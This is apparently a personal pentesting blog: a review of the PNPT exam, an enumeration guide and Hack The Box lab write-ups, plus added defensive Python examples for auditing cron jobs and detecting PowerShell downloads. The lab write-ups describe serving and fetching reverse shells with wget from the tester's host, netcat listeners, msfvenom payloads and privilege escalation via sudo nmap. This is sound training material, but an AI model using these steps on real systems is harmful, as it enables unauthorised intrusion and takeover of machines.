My Experience Taking the PNPT (Practical Network Penetration Tester) Certificate

In April, I got a huge surprise when Heath Adams (also known as The Cyber Mentor), founder of TCM Security and creator of TCM Academy, contacted me asking me to beta test his new penetration testing certificate. Although I was surprised that I was chosen to beta test, I was not surprised that Heath was making a certificate. His courses have helped thousands of people and it seemed like, after the academy, a certificate would be a great addition to that.

I just want to state up front that I do not have any other cybersecurity certificate, other than the PNPT. I cannot make comparisons against the OSCP or the eJPT.

My Overall Experience

As I mentioned above, I first did this certificate in April and made it to day 5. However, I woke up on day 5 to find out that my mother had passed during the night. Heath was very kind about the situation and told me I could retake the exam once I felt ready to do so. Knowing what I know now, I never would have passed the first time I took the certificate. In the meantime, I went to Canada to help my father with my mother’s passing. Once everything slowed down, I re-scheduled my exam.

In terms of scheduling, you pick a date and time. From that date and time, you have 5 complete days to compromise the domain controller. You are given an OVPN file and the Rules of Engagement (that are super clear) via email the moment your exam begins. At no moment during the testing did I have any problems with the technology. I personally needed almost all of the five days, but I can see how those with a lot of experience could complete the certificate sooner. Throughout the 5 days, Heath was always accessible if I had any questions.

Although I cannot make comparisons to the eJPT or the OSCP, I can say that this certificate feels like a penetration testing engagement you would see in the real world. The emphasis here is really on the practicality. You conduct OSINT, do an external and then move onto an internal penetration test where you have to compromise the domain controller. Even the way you go about exploiting, to me, feels like something that would really happen in a real company’s network.

In addition to actually exploiting all of these systems, you have two days to write a penetration testing report and then, after, conduct a debrief, enhancing the practicality of the certificate. I took great care writing the report and prepared a PDF for the debrief. I wanted both to represent what I would do in an actual job. During the debrief, Heath gave me feedback that I could use to improve those also.

Recommendations for Test-Takers

The first thing I recommend is, if you do not have work experience as a penetration tester, make sure you complete all of Heath’s courses on the TCM Academy and take detailed notes. At this moment, you can purchase a bundle with all courses. Everything you will need to pass is either explicitly shown in his course, or alluded to.

Note that, depending on your skill and experience, you may need to take the complete 5 days. I was lucky because, since I work as a higher education instructor, I was in between semesters. I would say I worked for sometimes 15 hours a day on this certificate. Again, some other people took way less time than me to complete the certificate.

What Could Be Improved

I think the ONLY suggestion I would make to improve the experience would be for Heath to expand TCM Academy a bit. As I mentioned, everything on the exam was explained in his courses, or was alluded to at some point. However, although we make labs in PEH and exploit Hack the Box and Try Hack Me boxes, they are not exactly what you could see on the exam.

I think that, like eJPT, the PNPT could have a few practice exams (that could be purchased?) to get some more practice in some specific aspects you see on the exam. I feel like, although I understood the course material, I had a hard time practicing outside of the course.

Concerns About Adoption?

I think some people may be concerned with the adoption of this certificate. Since the certificate is so new, you may think it may better serve you to take the eJPT or just wait to take the OSCP. In all honesty, I disagree. Given that Heath is very well-known in the field and given the practicality of the certificate, I do see that the PNPT will very quickly be adopted by companies in the future. Even if you disagree, the learning curve I went through while taking the certificate was extensive, and I learned so much in just 5 days. This was the first time I REALLY became a pentester, and I was able to feel this during the certificate.

Final Thoughts

Overall, I loved my experience taking the PNPT. I never thought I would pass. I would not even have TAKEN the PNPT yet if Heath did not contact me. On Day 4 I resigned myself to not passing, but I would get as far as I could anyway. Day 5, at 5pm, I was able to compromise the domain controller. I spent 5 days banging my head on the table, but felt such elation when I solved the problem, only to be followed by another challenge. Eventually, I passed the PNPT.

The entire certificate process was extremely clear and was formatted in a practical way that gave me the confidence to know that, if I got a penetration tester job, I have the skills to compromise systems, write a report and effectively explain my report to clients. I had no issues with technology. Although I cannot compare the PNPT with the eJPT or the OSCP, I do think it is a worthwhile certificate to obtain.

For test-takers – make sure you take all of Heath’s courses and write excellent notes. Also be aware that, depending on your skill level, you may need the 5 complete days.

The only thing I would add is perhaps more practice prior to the exam with certain aspects. Hopefully that could come in the future.

I want to thank Heath one more time for asking me to beta test the certificate and then allowing me to re-take the exam. Thank you for answering all questions I had during the certificate also. It was invaluable.

How I Enumerate in Pentesting

Hello everyone! In this post, I am telling you how I enumerate while doing pentesting on a box on Hack the Box or TryHackMe. Please remember that I would say I am an “intermediate” student. However, if you are a beginner and want easy commands/strategy to begin attacking your first boxes, this is the post for you! This post does not cover any exploitation, but I will show you how to get started finding the information that you need in order to do so.

Ping the Host

First things first. Ping the IP that you are attacking to make sure it works. If it does not, it may be an issue with your VPN, or the box has not finished loading. I would wait 5 minutes if it does not ping back. If, after 5 minutes, the ping still does not work, I recommend downloading your VPN file again and trying again. If that does not work, restart your machine.

ping <target IP>

Nmap

I always begin my enumeration using different nmap scripts. Here are the commands I do.

Note that you may receive an error saying to add “-Pn” to the command. Do it!

nmap -T4 -p- <target IP>

I use this command first. It checks ALL 65,535 ports rather than nmap’s default top 1,000, so it takes a bit of time. I do this to make sure my initial scan did not miss any ports.

nmap -A -T4 -p80,22 <target IP>

The above command scans only the specific ports that you found in your previous scan, but returns more in-depth information (-A turns on OS detection, version detection, the default scripts and traceroute). Your ports may not be 80 and 22. I just wanted to show you the format for listing ports.

Lastly, I like running nmap’s “vuln” script category against the ports to see if any known vulnerabilities are flagged. This makes your work easier!

nmap --script vuln <target IP>

Enum4Linux

I like to run enum4linux if the target machine is a Linux system. Here is more information on enum4linux: https://tools.kali.org/information-gathering/enum4linux.

enum4linux <target IP>

Port 80

If port 80 is open, I usually run dirb before running dirbuster. Dirb will find basic directories that I can begin evaluating as I do a dirbuster attack. Dirb finds directories on port 80. I would suggest running dirb on every directory that you find. For example, scan <target IP>, then scan <target IP/admin> if that directory shows up. This is not a very quick system and you can do better with other tools, but it is an initial start compared to the more heavy dirbuster and ZAP programs.

Also, enter the IP in the browser!

For example, <target IP:port> to see what is on the page. You can inspect the page to see if you can find version information anywhere, which will help in the exploitation phase.

I also recommend installing the Firefox extension Wappalyzer. This extension can tell you what the page is using (for example, Apache 2.1.4). Then, you can look up exploits for this!

Some More Tools for Port 80

If you have a port 80, there are some other tools you can use for enumerating.

You can run:

nikto -h <ip>

The above command pulls the server header, versions, etc.

The next tool I recommend is dirbuster. With dirbuster, you can find not only directories, but also other files. Dirbuster is already on Kali Linux. I like using the GUI so, in the search section on Kali, I just type “dirbuster” and open the program.

Here are some instructions for how to use dirbuster:

  1. Put the target IP (and port) into the “Target URL” section. Remember, if you have other ports, like RPCs, you should run a different scan on that port.
  2. Click “Go Faster” to increase the threads.
  3. You will need to insert a wordlist file. I recommend using the medium list on dirbuster. This is located in /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt.
  4. Check mark “brute force directories”, “files”, and “be recursive”
  5. If there is a specific directory you want to look in (for example, a hidden directory) enter it under “Dir start with”. For example, “/admin”.
  6. Enter different file extensions to look for: php, asa, sql, zip, tar, pdf, txt, bak.
  7. Begin the scan!

Once dirbuster has completed, I then run OWASP Zap, which is also part of Kali Linux. In OWASP Zap, you can use “Attack Mode” to run a spider on a web page. This is another way to find directories, which I do in addition to dirbuster, just in case something gets missed. Here is a page to help you to run this scan: https://www.softwaretestinghelp.com/owasp-zap-tutorial/

Lastly, I like to run “curl --head <target IP>”. This finds more information on port 80 (i.e. other directories, etc.)

What Next?

Well, once you have finished your enumeration and have found all of the files, directories, ports, services running, etc., you now have a master list of things on which to look for exploits. For example, if an Apache server is running and you have the version, look in searchsploit, exploit-db or just Google for an exploit for that version. If you have port 22 open, you can research how to exploit port 22. However, you need to know WHAT you have on the system before you can exploit it.
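As an added illustration of that “master list” idea (example code, not from the original post): the script below parses nmap’s greppable output (saved with -oG) into a per-host inventory of open ports, services and fingerprinted versions, and separates the entries that are ready to look up from the ones that still need a version. The scan output inside it is constructed, not a real scan. A defender can run the same parse over a scan of their own network and diff it against an asset baseline.

```python
"""Turn nmap greppable (-oG) output into a per-host service inventory.

Added example, not from the original post. It assumes a scan saved with
`nmap -sV -p- -oG scan.gnmap <target>`; the sample below is constructed.
"""
from collections import defaultdict

# Constructed sample of nmap -oG output (not a real scan result).
SAMPLE_GNMAP = """\
# Nmap 7.91 scan initiated as: nmap -sV -p- -oG scan.gnmap 10.10.10.7
Host: 10.10.10.7 ()\tStatus: Up
Host: 10.10.10.7 ()\tPorts: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.2.3 ((CentOS))/, 111/open/tcp//rpcbind//2 (RPC #100000)/, 143/filtered/tcp//imap///, 10000/open/tcp//http///\tIgnored State: closed (65530)
# Nmap done -- 1 IP address (1 host up) scanned
"""


def parse_gnmap(text):
    """Return {host: [{port, proto, state, service, version}, ...]}.

    Each port entry has seven slash-separated fields:
    port/state/protocol/owner/service/rpcinfo/version/ . The version text
    may itself contain slashes, so the entry is split at most six times.
    Assumes version strings contain no ", " (nmap's entry separator).
    """
    inventory = defaultdict(list)
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue                              # comments, Status-only lines
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\tIgnored State:")[0]
        for entry in ports_field.split(","):
            fields = entry.strip().split("/", 6)
            if len(fields) < 7:
                continue
            port, state, proto, _owner, service, _rpc, version = fields
            inventory[host].append({
                "port": int(port),
                "proto": proto,
                "state": state,
                "service": service,
                "version": version.rstrip("/").strip(),
            })
    return dict(inventory)


def open_services(inventory):
    """Flatten to sorted (host, port, service, version) rows, open ports only."""
    rows = []
    for host, entries in inventory.items():
        for e in entries:
            if e["state"] == "open":
                rows.append((host, e["port"], e["service"], e["version"]))
    return sorted(rows)


def research_queue(inventory):
    """Split open services into those with a fingerprinted version (ready to
    look up in searchsploit / exploit-db / vendor advisories) and those
    without one (they need more enumeration before you know what they are)."""
    versioned, unversioned = [], []
    for host, port, service, version in open_services(inventory):
        label = f"{host}:{port} {service} {version}".strip()
        (versioned if version else unversioned).append(label)
    return versioned, unversioned


if __name__ == "__main__":
    inv = parse_gnmap(SAMPLE_GNMAP)
    todo, unknown = research_queue(inv)
    print("Look up these versions:")
    for item in todo:
        print("  ", item)
    print("No version fingerprint yet (enumerate further):")
    for item in unknown:
        print("  ", item)
```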

Conclusion

As I mentioned at the beginning of this post, I am an intermediate learner. There are probably still tools and other ways of enumerating I have yet to learn. However, if you are a beginner, this is a good list to begin your pentesting learning. Although you may not become an expert at enumeration with this post, I hope it is invaluable to you for helping you begin the enumerating process.

Hack The Box – Beep

Introduction

In this write-up, I will be showing how I owned the box Beep on Hack the Box. This is a recommended box for future OSCP takers to complete to improve their skills. My previous boxes were for the mid-course capstone for the Practical Ethical Hacking course by The Cyber Mentor. However, since I still have more time on my Hack the Box membership, I will begin completing more recommended boxes for the OSCP. I finished this box a few days ago, and I want to show how I completed it. This write-up will include how I enumerated the machine, how I exploited the machine, and how I escalated my privileges to get the user and root flags. Throughout, I also show the difficulties I had and how I overcame them.

Enumeration

As other nmap scripts were running, I first found the version for Apache. Although I did not know yet that port 80 was open, I definitely knew there was something on this port.

After, my results came in on nmap. Wow, that is a LOT of ports!

After checking SSH and port 25 in the browser, I decided to go check on port 80. I had to accept a certificate, and then got redirected to port 443, leading to the page below. A login page – great. I added elastix to the already long list of programs I should check for exploits.

Once I was done checking every port in the browser for information, I looked for exploits for EVERY service above using searchsploit (I am trying to avoid Metasploit, when possible) and found 10 different exploits that could work.

I eventually got to exploit 18650.py, which requires you to create a netcat listener and change the python file to reflect the target’s IP, your local IP and your local port. Once I made these changes, I ran the python file and got the following error:

I was wondering why I had this error so I Googled it which, of course, led to a write-up for this box. One of the users said that you had to figure out the “extension” bit of the code by typing the following and change it in the python file. Then, you add some more code. This is to override the certificate portion we encountered at the beginning. Please see the write-up for the code.

Then, I got THIS error and realized, after pinging the host, that the Destination Host was unreachable.

I left for a few hours, thinking that the error had something to do with the box, and I had the same error. I searched online and found that it was probably due to my VPN file. I re-downloaded it and then it worked again! Phew! Now, back to the above error regarding the certificate override. I was finally able to run the code and change the “extension” portion. Now I got this error:

I went back to my Python file and got the above error. Clearly I was in for an error-filled night. I looked this error code up and found that I needed to change my /etc/ssl/openssl.cnf file.

Once this change was made to my own Kali settings I ran the python file. I FINALLY GOT THE SHELL!

I upgraded my shell and found I was “asterisk”. I immediately tried the root folder, which I clearly did not have permission to use. I just made my way then to the user folder and got the user flag.

Privilege Escalation

Now that I was in and had the user flag, I needed to escalate my privileges to get the root flag. I first put the script LinEnum onto the machine by going into the /tmp folder and, first, going onto my Kali system terminal and creating a python server. This requires you to have LinEnum downloaded onto your machine first.

sudo python -m SimpleHTTPServer 80

Then, I went onto the target machine’s shell and typed:

wget http://<myIP>/LinEnum.sh

I did find some information, which I saved onto my computer. Here is some of the information:

The one I was most interested in above was the /usr/bin/nmap file. I tried running:

nmap --interactive

which did not work. SPOILER ALERT: You will see what I did wrong later…

I also ran:

sudo -l

which showed me the services “asterisk” could use.

I was unsure how to exploit these, except for nmap, so I decided to look at write-ups. This writeup suggested I change the permissions of /bin/chown to get root, using the code below. This did not work for me as you can see. Then… I saw my mistake with the nmap code I ran below. I forgot sudo. Now I felt dumb.

AND IT WORKED! I got the root flag!

Conclusion

In conclusion, this box gave me quite a few challenges. I learnt quite a few lessons. I was able to practice my troubleshooting skills with this box, which I am usually good with. I am very happy I did not need Metasploit to own this box. I learnt to add sudo before the nmap code. Overall, this box was very informative. There are other ways to own this box, including using vTigerCRM. I would look at other write-ups to see how others were able to accomplish this. One write-up, in particular, uses multiple methods to exploit vTigerCRM. It is worth a look.

Until next time,

Melanie

Hack The Box – Lame

Introduction

In this post, I am covering how I broke into the box Lame on Hack the Box. I have broken into this box as per the mid-course capstone for the course Practical Ethical Hacking by The Cyber Mentor, and this was my last box to complete! I had some difficulties with connecting to this box for the past several weeks, but I was able to accomplish my task today!

Also, I am very happy that I remembered to take good screenshots today!

Enumeration

The first thing I did was enumerate the target with nmap and found the following ports open.

Since I see that this is a Linux machine, I ran enum4linux to see if I could find anything else. I found some shares! I thought that this might be useful, and I also noticed again the Samba 3.0.20-Debian. I was really tempted by the tmp share, and noted it for later also.

I also found some interesting information about ftp through another nmap script:

Exploitation

Once I enumerated all of the ports, I decided to start looking for exploits. First, I looked for exploits using searchsploit to try to avoid using Metasploit since the OSCP does not allow you to use Metasploit much. Then, I looked for exploits in Metasploit.

As you can see above, I looked for the various services to see if there were good exploits. Usually I look for remote code executions, but this time I looked at any exploit that seemed interesting. By looking through searchsploit for every service, I found 5 python scripts that could work and 1 Metasploit module. I tried each python script first, but none seemed to work. So, I decided to check out exploits in Metasploit. I first looked for a samba exploit given that this was the result I obtained from my searchsploit search.

I took a look at the exploits marked “excellent” and checked them out. The first one was an “Arbitrary Module Load”, which I did not understand, so I moved on for now. I would go back to it if I needed to. The next one was a “username map script”. I thought this could be useful to find usernames, so I tried this one.

Once I entered the options and exploited the machine, you can see I got a shell! And I had root! I was not expecting that.

So, clearly it was easy to find both the user.txt and the root.txt files.

Conclusion

With this box I really wanted to be more patient and enumerate EVERYTHING. I wanted to be patient and check every possible exploit. Without this strategy, I probably would have not tried the exploit from above. I would have looked for an RCE, which I would not have found immediately. Thankfully, taking more time and not rushing really allowed me to explore files. Looking at the user, “makis” files, I saw a few more possibilities I could have tried to get to root, but I was really lucky to find this exploit. Also, note that I started automatically just using “ls -la”! Yay!

Hack the Box – Bashed

Introduction

Hello everyone! Welcome to my writeup for the box Bashed! This box was a tough one for me. For the privilege escalation, I definitely had to use a writeup in order to accomplish this task. Even then, I am not even sure I could redo this box with a different scenario! Either way, I am showing you here what I did, though I recommend following the writeup linked below. It will be MUCH more helpful than I can be.

I am doing this box as part of the mid-course capstone for the course Practical Ethical Hacking by The Cyber Mentor. Later, I will watch the video for this box with his explanation and hopefully I will understand it more.

Writeup Used: https://resources.infosecinstitute.com/topic/hack-the-box-htb-walkthrough-bashed/

Enumeration

The first thing I did was run my basic enumeration (I will make a post explaining how I enumerate), and found the following ports opened.

Once I did my scans, I went to the webpage where it explicitly talks about the exploit phpbash (a github link). I downloaded this .php file for use in the future. I imagine that, if I am able to upload a .php file in the future, I could upload this phpbash.min.php file to the webpage to run this terminal in the window. However, if I can upload a file, couldn’t I just upload a reverse shell? The github says you use this file when you cannot do a reverse shell, but I am unsure when that would be the case. Comment below if you know!

Exploitation

Once I found the location of the phpbash.min.php file while going through the directories (found using dirb) on port 80, I opened the file in the browser. A note – you can use phpbash.php as well, though it did not work for me. An interactive web shell!

I was able to go around everywhere here and find the user.txt file.

At this point, I wanted to get a shell on my own terminal because I could not access the /root file, and you cannot do so through this interactive web shell. So, I thought best to upload a php reverse shell into the target machine to open it up!

The first thing I did was create a python server. Then, I uploaded the php-reverse-shell I downloaded a while back from Pentest Monkey (you have to change the LHOST and the LPORT in the file first!). Then, I used the following command to upload the file in the interactive web shell in a location with write privileges (ended up being the uploads folder): wget http://<MYIP>/php-reverse-shell.php. I then made a netcat listener with the port that I included in the php-reverse-shell.php file.

Once there, I opened the file location in the browser and got a shell on my system!

Privilege Escalation

The first thing I did was run sudo -l (though I should have done “id” first) to see privilege. This privilege escalation was where I needed help from a writeup (listed above).

With sudo -l, you find out that this user can run commands as scriptmanager. After looking around the directories and files, I found it. As per the writeup, you have to run the command “sudo -u scriptmanager /bin/bash”, which changes my user to scriptmanager. I then also improved my shell using the command below: python -c 'import pty; pty.spawn("/bin/bash")'

Okay, this next step did a number on me and I completely followed the writeup I posted above. I went back to the main directory list and did “ls -la” to see the permissions. Since I am now scriptmanager, I see that I have permissions for a folder called “scripts”. Once I get there, there is a .py and a .txt file. The .py file writes to the .txt file, which is owned by root. According to the writeup, the file runs every minute, which I see in the timestamps when I used “ls -la”.

At this point, the writeup above explains that you can use a python script from Pentest Monkey, which will create a reverse shell once you edit its contents to include the lhost and an lport. I FORGOT TO SCREENSHOT THIS SO PLEASE LOOK AT THE CONTENTS IN THE WRITEUP! There is an image with the code.

I started a netcat listener with the port I put in the python file. In the scripts folder (since I have permissions), I uploaded the python file using “wget http://<MYIP>/<MYPYTHONFILE>”. After about a minute, I got a shell with root! At this point, I was able to get the root flag!
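The escalation above works because a root cron job runs a script sitting in a directory that scriptmanager controls, so whatever is dropped there runs as root a minute later. As an added example (not from the original post or the linked writeup), the audit below reads system-crontab lines and flags root jobs whose script, or the directory holding it, is owned or writable by someone other than root. The layout it audits is constructed in a temporary directory and the current uid stands in for root so it runs unprivileged.

```python
"""Audit crontab entries for the weakness used on Bashed: a job that runs as
root but executes a file that a non-root user can modify or replace.

Added example, not from the original post. It expects system-crontab lines
(minute hour dom month dow user command) and checks every absolute path in
the command plus its parent directory. The files below are constructed.
"""
import os
import shutil
import stat
import tempfile

OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH


def check_path(path, trusted_uid=0):
    """Return reasons why `path` could be changed by someone other than root."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: does not exist (whoever controls its directory can create it)"]
    reasons = []
    if st.st_uid != trusted_uid:
        reasons.append(f"{path}: owned by uid {st.st_uid}, not by root")
    if st.st_mode & OTHER_WRITE:
        reasons.append(f"{path}: group/other writable ({stat.filemode(st.st_mode)})")
    return reasons


def audit_crontab(lines, trusted_uid=0):
    """Return [(command, [reasons])] for root jobs whose files are not root-controlled."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                          # comments and VAR=value lines
        parts = line.split(None, 6)           # 5 time fields, user, command
        if len(parts) < 7 or parts[5] != "root":
            continue                          # only jobs that run as root matter here
        command = parts[6]
        reasons = []
        for token in command.split():
            if token.startswith("/"):         # script (or absolute interpreter path)
                reasons += check_path(token, trusted_uid)
                reasons += check_path(os.path.dirname(token), trusted_uid)
        if reasons:
            findings.append((command, reasons))
    return findings


def demo_audit():
    """Build a constructed layout like Bashed's /scripts folder and audit it.

    Returns the basenames of the scripts that were flagged."""
    base = tempfile.mkdtemp()
    try:
        for name, mode in {"scripts": 0o777, "safe": 0o755}.items():
            d = os.path.join(base, name)
            os.mkdir(d)
            os.chmod(d, mode)                 # chmod is not subject to umask
            job = os.path.join(d, "job.py")
            with open(job, "w") as fh:
                fh.write("print('hello')\n")
            os.chmod(job, 0o755)
        loose = os.path.join(base, "safe", "loose.py")
        with open(loose, "w") as fh:
            fh.write("print('hi')\n")
        os.chmod(loose, 0o666)                # the file itself is world-writable
        crontab = [
            "# m h dom mon dow user command",
            "SHELL=/bin/sh",
            f"* * * * * root python3 {base}/scripts/job.py",       # writable dir -> flagged
            f"0 3 * * * root python3 {base}/safe/job.py",          # fine
            f"0 4 * * * root python3 {loose}",                     # writable file -> flagged
            f"*/5 * * * * www-data python3 {base}/scripts/job.py", # not root -> ignored
        ]
        findings = audit_crontab(crontab, trusted_uid=os.getuid())
        return sorted(os.path.basename(cmd.split()[-1]) for cmd, _ in findings)
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    print("Flagged scripts:", demo_audit())
```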

Conclusion

I NEED to get better at taking screenshots. I know that, in the OSCP, I have to be good at this. I think that I might do an interval timer during my next box (finishing off with Lame!) every 10 minutes and I will take a screenshot of my progress then, or something along those lines. My problem appears to be that I get so engrossed in solving the problem and trying things, I forget to take screenshots!

I also know that I will have a hard time replicating this box. I understood the mechanics described in the walkthrough and why they did what they did, but I am quite certain I would not be able to identify these steps and complete them in the future on my own. I will continue working and hopefully this walkthrough helped me, but it feels like I hit a wall without knowing how to go above it, because I do not want to just go around it and avoid the learning. Hopefully I will understand it more in the future and after watching The Cyber Mentor’s explanatory video that he provides in his course Practical Ethical Hacking.

How I solved Hack The Box’s Netmon (Successes and Failures!)

Introduction

In this writeup, I am going to be showing you how I solved the box Netmon on Hack The Box. I definitely could not solve this box without a writeup, but I will show you what I did and the resources I used to solve this. This is part of the mid-course capstone from The Cyber Mentor’s Practical Ethical Hacking course.

Enumeration

So, the first thing I did was run an nmap scan to find the open ports. I personally dislike enumerating port 80, so I wanted to figure out if I could own this box WITHOUT having to look at port 80. I was wrong, haha.

Exploitation

I first began with port 21, with FTP because it is possible to sign in anonymously with FTP (user as anonymous and password as anonymous). This ended up working! Going through all of the files, I was able to find the user.txt file. A note: ALWAYS REMEMBER TO DO ls -al, not just ls!!!! It took me a while to find the files I was looking for because most of the files were hidden. I need to try to get out of that habit!

The issue I was running into was getting into the Administrator folder. I was getting a 550 error code, which meant that this ftp route was not going to get me the root.txt file. However, upon looking at a writeup, I found out how to get credentials for the PRTG Network Monitor (on port 80). What you have to do is find the PRTG Configuration.old.bak file. In this version of Windows, this can be found in “ProgramData/Paessler”. This is my point from above. ProgramData was hidden, so I could not find anything! Once I figured that out, I found the file required and did a “get” command to put it on my computer. I opened the file on Kali with “gedit” and searched until I found “dbpassword”.

At this point, I tried the password in PRTG Network Monitor and it did not work. I changed the year posted in the password and was able to get in!

Once logged in, I looked for an upload form on the application to upload a reverse shell. However, I could not find one and used this writeup to find this exploit. The author did not explicitly use this exploit but rather a different script, but the exploit ran well enough for me. I felt foolish here because I definitely could have looked this up for myself. So, I cloned the git repository and opened the file to see how to use it.

As you can see below, once I ran the exploit I got a shell immediately.

I did not do anything else except move to the Administrator folder and I was able to get the root file!

This write-up here shows another way that this could have been done. I wrote it in my notes just in case the above method does not work.

Conclusion

In reality, I am a little bit disappointed in my ability to own this box. I was able to get the user.txt file quite easily. However, as soon as I had to use a web application, I tripped over myself. I am unsure why port 80 is always so difficult for me, but I guess I am always just boosting my skills and trying to improve. I am happy that I could understand the write-ups well enough to be able to solve the issue, but it did feel like a bit of a step back and a hit to my confidence.

Grandpa – Hack The Box

Introduction

In this writeup, I am talking about how I was able to get both the user and root flags for this Hack the Box box. I did this as per The Cyber Mentor’s Practical Ethical Hacking course for the capstone project. However, I want to disclose that I was working on the box “Bashed” before this and I gave it up. I got partway, got stuck, looked at a writeup and became confused. So I decided to leave it and come back to it after watching The Cyber Mentor’s video explaining the box. However, I am very proud of my progress on this box, though I felt bad that I could not solve Bashed. Either way, I hope you enjoy this writeup!

Enumeration

As per usual, I enumerated the machine using nmap and other scripts.

Given that port 80 was open, I went to the browser and looked at the page. After inspecting the page and running dirb, I realized that I was a bit stuck. After I ran nikto, I noticed some things, like WebDAV being used. Not that I knew what that meant.

Exploitation

After enumerating, I decided to search for exploits for the different services running. This one seemed interesting, given that I had noted that WebDAV is being used. The instructions seemed simple, so I tried it out!

As per the author’s instructions, I did the following:

And I got a shell! However, I could not do much. I could not even get into the user, Harry’s, folder! At this point, I decided to use “search suggester” (one of my favorite tools!) to see if there is an easy exploit to get into the machine.

I tried the different exploits, but noticed in both that they both had the same “Operation failed” error. I decided to look up the error, and I found this writeup for “Granny” – another box: https://blog.barradell-johns.com/index.php/2019/07/27/htb-granny/. I noticed that this exploit also says “Exploit completed, but no session was created” and realized (from the above writeup) that, in this case, I could migrate to another service and I could probably get system!

So, I migrated to 1828 and, when I opened meterpreter again, I got system!

At this point, I did not even have to do privilege escalation! I had access to everything!

Conclusion

In conclusion, this box was not too hard for me. It was a bit of a confidence booster, given my failure of the “Bashed” box. I did get tripped up a bit when an exploit did not work, but it was a good lesson about migrating. I saw this process in a course I did with The Cyber Mentor (on YouTube for free), but I did not 100% understand it. Now I understand the application. How great!

Optimum – Hack the Box

Introduction

Hello everyone! I am continuing on my journey to the OSCP by doing the mid-course capstone boxes in the Practical Ethical Hacking course by The Cyber Mentor. This time, I was working on the Optimum box. I am so proud to say that I did not need ANY WRITE-UPS to complete this box! This is because I have already learned through a Try Hack Me box how to exploit HTTPFileServer version 2.3. In this blog post, I will show you my steps for escalating to root and obtaining the root and user flags through enumeration, exploitation, and privilege escalation. I will also show parts that I may have gotten wrong.

Enumeration

As always, I began with my normal nmap scans. The only port found was port 80.

When I see a port 80, I first look at the webpage. I noticed here the version with the login page. I also inspected the content of the page and noticed that HTTPFileServer was from Rejetto. At this moment I remembered I had exploited this before. So, I knew that I could exploit this page or try to brute force the login or log in with default credentials.

Exploitation

The first thing I did was try the exploit I had used in the past using my notes. I used the command “searchsploit http file server rejetto” and found the .py file I had used before. I searched my exploit folder that I created with exploits I have used in the past and found the rejetto one. I opened up the .py file with gedit and looked for the places that required changes (LHOST and LPORT) as well as how to run the .py file.

As per my notes, I also remembered that I needed to run a netcat listener and a python HTTP server in the same location as the file. Once both of these things run, I ran the .py file with the appropriate arguments, which led me to the user shell.

As you can see from the above photo, I immediately tried finding some information about the system, and I realized I was using meterpreter commands. I figured that, after I found the user.txt file, I would jump to meterpreter anyway because they have a “search suggester” command, which looks for exploits related to my machine.

In order to change my netcat shell to a meterpreter session, I made the following msfvenom payload using my LHOST and an LPORT.

Then, I opened Metasploit and made a listener using the same port and payload as the msfvenom payload. I made sure that I also had a Python server running in the location of the optimum.exe payload file I created.

From there, I used PowerShell to download that file into the netcat shell and ran the file.

Once I had the meterpreter shell, I used my meterpreter commands to get more information. Then, I backgrounded the session, ran “search suggester”, and ran the suggester against my backgrounded session. This gave me 2 exploits, seen at the bottom. I ran the first exploit, which did not work. Then I ran the second one, which did work!
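The shell upgrade described above leaves a telemetry trail a defender can key on: a PowerShell process with a download primitive on its command line, followed within seconds by a new process whose image is the file that was just written into a user-writable directory. As an added example (not code from the original post or from TCM), here is a small Python detector run over constructed process-creation events in a simplified Sysmon-like shape. The hostnames, paths, timestamps and the 10.10.14.5 address in the sample are all made up for the demo.

```python
import re
from datetime import datetime

# Constructed sample process-creation events (not real telemetry), in a
# simplified Sysmon-like shape: (timestamp, host, parent image, image, command line).
SAMPLE_EVENTS = [
    ("2020-12-01T10:00:01", "WS01", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell.exe -NoProfile -Command "Get-Process"'),
    ("2020-12-01T10:02:10", "WS01", r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -c \"(New-Object Net.WebClient).DownloadFile("
     "'http://10.10.14.5:8000/optimum.exe', 'C:\\Users\\user1\\Desktop\\optimum.exe')\""),
    ("2020-12-01T10:02:15", "WS01", r"C:\Windows\System32\cmd.exe",
     r"C:\Users\user1\Desktop\optimum.exe",
     r"C:\Users\user1\Desktop\optimum.exe"),
    ("2020-12-01T10:05:00", "WS02", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell.exe -c "Invoke-WebRequest https://example.com/notes.txt -OutFile C:\\Temp\\notes.txt"'),
]

# Download primitives commonly seen on PowerShell command lines.
CRADLE_RE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer", re.I)
# A Windows path: drive letter, colon, backslash, then anything up to a quote, space or ')'.
WIN_PATH_RE = re.compile(r"[A-Za-z]:\\[^'\"\s)]+")
# Locations an unprivileged user can normally write to.
USER_WRITABLE_MARKERS = ("\\users\\", "\\temp\\", "\\programdata\\")


def is_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE_MARKERS)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_download_then_execute(events, window_seconds=600):
    """Correlate a PowerShell download into a user-writable path with a later
    process start of that same file on the same host. Events must be in time order."""
    dropped = {}   # (host, lowercased path) -> time the download was observed
    alerts = []
    for ts_str, host, parent, image, cmdline in events:
        ts = datetime.fromisoformat(ts_str)
        if basename(image) == "powershell.exe" and CRADLE_RE.search(cmdline):
            targets = [p for p in WIN_PATH_RE.findall(cmdline) if is_user_writable(p)]
            for p in targets:
                dropped[(host, p.lower())] = ts
            alerts.append({"severity": "medium", "rule": "powershell_download_cradle",
                           "host": host, "paths": targets})
        key = (host, image.lower())
        if key in dropped and (ts - dropped[key]).total_seconds() <= window_seconds:
            alerts.append({"severity": "high", "rule": "download_then_execute",
                           "host": host, "image": image, "parent": parent})
    return alerts


if __name__ == "__main__":
    for alert in detect_download_then_execute(SAMPLE_EVENTS):
        print(alert)
```

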